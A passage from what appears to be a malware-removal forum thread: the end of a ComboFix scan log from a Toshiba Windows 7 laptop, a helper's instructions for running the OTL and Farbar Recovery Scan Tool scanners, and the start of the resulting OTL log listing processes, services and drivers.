S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3hub.sys [x]

S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3xhc.sys [x]

S3 PGEffect;Pangu effect driver;c:\windows\system32\DRIVERS\pgeffect.sys;c:\windows\SYSNATIVE\DRIVERS\pgeffect.sys [x]

S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]

S3 TMachInfo;TMachInfo;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [x]

S3 TOSHIBA HDD SSD Alert Service;TOSHIBA HDD SSD Alert Service;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [x]

S3 TPCHSrv;TPCH Service;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe [x]

S4 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]

.

.

--- Other Services/Drivers In Memory ---

.

*NewlyCreated* - MBAMSWISSARMY

.

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]

2014-10-21 16:39 1089352 ----a-w- c:\program files (x86)\Google\Chrome\Application\38.0.2125.104\Installer\chrmstp.exe

.

Contents of the 'Scheduled Tasks' folder

.

2014-10-29 c:\windows\Tasks\Adobe Flash Player Updater.job

- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-02 01:24]

.

2014-10-25 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job

- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-03-24 18:59]

.

2014-10-29 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job

- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-03-24 18:59]

.

2014-10-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job

- c:\users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-12 01:07]

.

2014-10-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job

- c:\users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-12 01:07]

.

.

--------- X64 Entries -----------

.

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ThpSrv"="c:\windows\system32\thpsrv" [X]

"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-07-02 167704]

"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-07-02 392472]

"Persistence"="c:\windows\system32\igfxpers.exe" [2011-07-02 416024]

"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2011-01-26 11775592]

"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2011-01-18 2188904]

"IntelPAN"="c:\program files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" [2011-06-01 1935120]

"TosSENotify"="c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe" [2011-06-10 710560]

"TosVolRegulator"="c:\program files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe" [2009-11-11 24376]

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]

"AppInit_DLLs"=c:\windows\System32\nvinitx.dll

.

------- Supplementary Scan -------

.

uLocal Page = c:\windows\system32\blank.htm

uStart Page = hxxp://start.toshiba.com/

mLocal Page = c:\windows\SysWOW64\blank.htm

uInternet Settings,ProxyOverride = <local>;192.168.*.*

IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000

IE: Se&nd to OneNote - c:\progra~2\MICROS~3\Office14\ONBttnIE.dll/105

TCP: DhcpNameServer = 192.168.1.254

DPF: {36299202-09EF-4ABF-ADB9-47C599DBE778} - hxxps://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab

.

- - - - ORPHANS REMOVED - - - -

.

Toolbar-Locked - (no file)

Wow6432Node-HKLM-Run-TSleepSrv - %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe

HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start

Toolbar-Locked - (no file)

HKLM-Run-TPwrMain - c:\program files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE

HKLM-Run-HSON - c:\program files (x86)\TOSHIBA\TBS\HSON.exe

HKLM-Run-TCrdMain - c:\program files (x86)\TOSHIBA\FlashCards\TCrdMain.exe

HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe

HKLM-Run-Teco - c:\program files (x86)\TOSHIBA\TECO\Teco.exe

HKLM-Run-TosWaitSrv - c:\program files (x86)\TOSHIBA\TPHM\TosWaitSrv.exe

HKLM-Run-TosNC - c:\program files (x86)\Toshiba\BulletinBoard\TosNcCore.exe

HKLM-Run-TosReelTimeMonitor - c:\program files (x86)\TOSHIBA\ReelTime\TosReelTimeMonitor.exe

.

.

.

[HKEY_LOCAL_MACHINE\system\ControlSet001\services\N360]

"ImagePath"="\"c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe\" /s \"N360\" /m \"c:\program files (x86)\Norton 360\Engine\21.6.0.32\diMaster.dll\" /prefetch:1"

--

.

[HKEY_LOCAL_MACHINE\system\ControlSet001\services\PCCUJobMgr]

"ImagePath"="\"c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe\" /s \"PCCUJobMgr\" /m \"c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\diMaster.dll\" /prefetch:1"

"ImagePath"="\SystemRoot\system32\drivers\N360x64\1506000.020\SYMNETS.SYS"

"TrustedImagePaths"="c:\program files (x86)\Norton 360\Engine\21.6.0.32;c:\program files (x86)\Norton 360\Engine64\21.6.0.32"

.

--------------------- LOCKED REGISTRY KEYS ---------------------

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]

@Denied: (A 2) (Everyone)

@="FlashBroker"

"LocalizedString"="@c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe,-101"

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]

"Enabled"=dword:00000001

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]

@="c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe"

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]

@Denied: (A 2) (Everyone)

@="IFlashBroker6"

.

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]

@="{00020424-0000-0000-C000-000000000046}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

"Version"="1.0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]

@Denied: (A 2) (Everyone)

@="FlashBroker"

"LocalizedString"="@c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]

"Enabled"=dword:00000001

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]

@Denied: (A 2) (Everyone)

@="Shockwave Flash Object"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"

"ThreadingModel"="Apartment"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]

@="0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]

@="ShockwaveFlash.ShockwaveFlash.15"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]

@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]

@="1.0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]

@="ShockwaveFlash.ShockwaveFlash"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]

@Denied: (A 2) (Everyone)

@="Macromedia Flash Factory Object"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"

"ThreadingModel"="Apartment"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]

@="FlashFactory.FlashFactory.1"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]

@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]

@="1.0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]

@="FlashFactory.FlashFactory"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]

@Denied: (A 2) (Everyone)

@="IFlashBroker6"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]

@="{00020424-0000-0000-C000-000000000046}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

"Version"="1.0"

.

[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]

@Denied: (A) (Everyone)

"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"

.

[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]

@Denied: (A) (Everyone)

.

[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]

"Key"="ActionsPane3"

"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"

.

[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]

@Denied: (Full) (Everyone)

.

Completion time: 2014-10-29 07:43:04

ComboFix-quarantined-files.txt 2014-10-29 12:42

.

Pre-Run: 317,728,055,296 bytes free

Post-Run: 317,590,884,352 bytes free

.

- - End Of File - - 500F346C1EA48CDF1B094B7850C8378B


OK, now some other scans to catch up the remnants.



Scan with OTL

Please download OTL by OldTimer and save the file to your desktop.

  • Right-click on the OTL icon and select Run as Administrator to start the tool.
  • Make sure that Scan All Users, LOP check and Purity check are ticked.
  • For 64-bit systems only - make sure that Include 64-bit option is also ticked.
  • Sections Processes, Modules, Services, Drivers, Standard Registry are set to Use Safelist.
  • Section Extra Registry is also set to Use Safelist.
  • Under the Custom Scans/Fixes bar in the box paste in the following:
    BASESERVICES
    drivers32
  • Push Run Scan and wait patiently.
  • Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of both logfiles in your next reply.


Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.


OTL Logs

OTL logfile created on: 10/29/2014 8:09:31 AM - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ADH.Heathman-PC\Desktop

64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.17116)

Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

7.91 Gb Total Physical Memory | 4.75 Gb Available Physical Memory | 60.09% Memory free

15.82 Gb Paging File | 12.42 Gb Available in Paging File | 78.55% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 449.23 Gb Total Space | 295.86 Gb Free Space | 65.86% Space Free | Partition Type: NTFS

Computer Name: HEATHMAN-PC | User Name: ADH | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2014/10/29 08:04:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

PRC - [2014/10/01 11:09:30 | 000,968,504 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

PRC - [2014/10/01 11:09:28 | 001,871,160 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

PRC - [2014/10/01 11:09:20 | 007,229,752 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

PRC - [2014/09/21 05:17:47 | 000,265,040 | R--- | M] (Symantec Corporation) -- C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

PRC - [2014/09/04 05:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

PRC - [2014/03/29 20:15:30 | 000,309,704 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe

PRC - [2013/11/15 09:24:50 | 000,137,528 | ---- | M] (Motorola Mobility LLC) -- C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

PRC - [2013/11/14 19:18:02 | 000,698,680 | ---- | M] (Motorola Mobility LLC) -- C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe

PRC - [2013/06/28 17:48:04 | 000,014,624 | ---- | M] (Intuit Inc.) -- C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe

PRC - [2012/11/20 08:27:33 | 000,132,056 | ---- | M] (Symantec Corporation) -- C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe

PRC - [2012/09/07 21:36:46 | 000,087,992 | ---- | M] (Nero AG) -- C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe

PRC - [2012/06/21 05:01:58 | 000,092,632 | ---- | M] (TomTom) -- C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe

PRC - [2012/02/29 19:02:00 | 002,348,352 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

PRC - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) -- C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

PRC - [2011/07/19 10:59:30 | 000,126,392 | R--- | M] (Symantec Corporation) -- C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

PRC - [2011/03/11 16:14:58 | 000,030,064 | ---- | M] () -- c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

PRC - [2011/02/01 15:24:42 | 002,656,280 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

PRC - [2011/02/01 15:24:40 | 000,326,168 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

PRC - [2010/08/23 20:21:40 | 000,013,672 | ---- | M] (Intuit Inc.) -- C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe

PRC - [2010/08/16 12:54:50 | 000,034,160 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe

PRC - [2010/06/04 18:32:58 | 000,252,792 | ---- | M] (TOSHIBA) -- C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe

PRC - [2010/03/11 16:06:06 | 000,193,824 | ---- | M] (Protexis Inc.) -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe

PRC - [2009/12/09 16:01:20 | 000,606,208 | ---- | M] () -- C:\Windows\Samsung\PanelMgr\SSMMgr.exe

========== Modules (No Company Name) ==========

MOD - [2014/01/20 14:17:04 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

MOD - [2014/01/20 14:16:38 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

MOD - [2009/12/09 16:01:20 | 000,606,208 | ---- | M] () -- C:\Windows\Samsung\PanelMgr\SSMMgr.exe

========== Services (SafeList) ==========

SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)

SRV:64bit: - [2011/07/01 13:46:14 | 000,828,856 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe -- (TPCHSrv)

SRV:64bit: - [2011/06/09 23:10:00 | 000,138,152 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe -- (TOSHIBA HDD SSD Alert Service)

SRV:64bit: - [2011/06/01 14:38:30 | 001,517,328 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\EvtEng.exe -- (EvtEng)

SRV:64bit: - [2011/06/01 14:23:40 | 000,340,240 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe -- (MyWiFiDHCPDNS)

SRV:64bit: - [2011/06/01 14:19:58 | 000,844,560 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe -- (RegSrvc)

SRV:64bit: - [2011/05/24 11:58:12 | 000,294,848 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\TOSHIBA\TECO\TecoService.exe -- (TOSHIBA eco Utility Service)

SRV:64bit: - [2011/05/17 16:34:18 | 000,574,896 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe -- (TosCoSrv)

SRV:64bit: - [2011/04/20 17:16:04 | 000,558,592 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\SysNative\ThpSrv.exe -- (Thpsrv)

SRV:64bit: - [2010/10/20 16:41:00 | 000,138,656 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\SysNative\TODDSrv.exe -- (TODDSrv)

SRV:64bit: - [2010/09/22 21:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)

SRV - [2014/10/01 11:09:30 | 000,968,504 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe -- (MBAMService)

SRV - [2014/10/01 11:09:28 | 001,871,160 | ---- | M] (Malwarebytes Corporation) [Disabled | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)

SRV - [2014/09/23 20:24:22 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2014/09/21 05:17:47 | 000,265,040 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe -- (N360)

SRV - [2014/09/04 05:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)

SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)

SRV - [2013/11/15 09:24:50 | 000,137,528 | ---- | M] (Motorola Mobility LLC) [Auto | Running] -- C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe -- (Motorola Device Manager)

SRV - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)

SRV - [2013/06/28 17:48:04 | 000,014,624 | ---- | M] (Intuit Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe -- (IntuitUpdateServiceV4)

SRV - [2012/11/20 08:27:33 | 000,132,056 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe -- (Norton PC Checkup Application Launcher)

SRV - [2012/09/07 21:36:46 | 000,087,992 | ---- | M] (Nero AG) [Auto | Running] -- C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe -- (DeviceMonitorService)

SRV - [2012/06/21 05:01:58 | 000,092,632 | ---- | M] (TomTom) [Auto | Running] -- C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe -- (TomTomHOMEService)

SRV - [2012/02/29 19:02:00 | 002,348,352 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)

SRV - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) [Auto | Running] -- C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe -- (PST Service)

SRV - [2011/07/19 10:59:30 | 000,126,392 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe -- (PCCUJobMgr)

SRV - [2011/07/11 19:16:06 | 000,057,216 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe -- (TMachInfo)

SRV - [2011/03/11 16:14:58 | 000,030,064 | ---- | M] () [Auto | Running] -- c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe -- (UDSS)

SRV - [2011/02/01 15:24:42 | 002,656,280 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)

SRV - [2011/02/01 15:24:40 | 000,326,168 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)

SRV - [2010/10/12 12:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)

SRV - [2010/08/23 20:21:40 | 000,013,672 | ---- | M] (Intuit Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe -- (IntuitUpdateService)

SRV - [2010/03/11 16:06:06 | 000,193,824 | ---- | M] (Protexis Inc.) [Auto | Running] -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2)

========== Driver Services (SafeList) ==========

DRV:64bit: - [2014/10/29 08:08:46 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)

DRV:64bit: - [2014/10/19 16:00:47 | 000,177,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS -- (SymEvent)

DRV:64bit: - [2014/10/01 11:11:26 | 000,063,704 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mwac.sys -- (MBAMWebAccessControl)

DRV:64bit: - [2014/10/01 11:11:12 | 000,025,816 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)

DRV:64bit: - [2014/08/25 21:26:58 | 000,593,112 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\symnets.sys -- (SymNetS)

DRV:64bit: - [2014/08/25 21:26:57 | 001,148,120 | R--- | M] (Symantec Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\SymEFA64.sys -- (SymEFA)

DRV:64bit: - [2014/08/25 21:26:56 | 000,493,656 | R--- | M] (Symantec Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\SymDS64.sys -- (SymDS)

DRV:64bit: - [2014/08/25 21:20:22 | 000,876,248 | R--- | M] (Symantec Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\srtsp64.sys -- (SRTSP)

DRV:64bit: - [2014/08/25 21:20:22 | 000,037,592 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\srtspx64.sys -- (SRTSPX)

DRV:64bit: - [2014/08/06 14:48:16 | 000,266,968 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\Ironx64.sys -- (SymIRON)

DRV:64bit: - [2014/02/20 18:14:34 | 000,162,392 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\ccSetx64.sys -- (ccSet_N360)

DRV:64bit: - [2013/10/01 21:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)

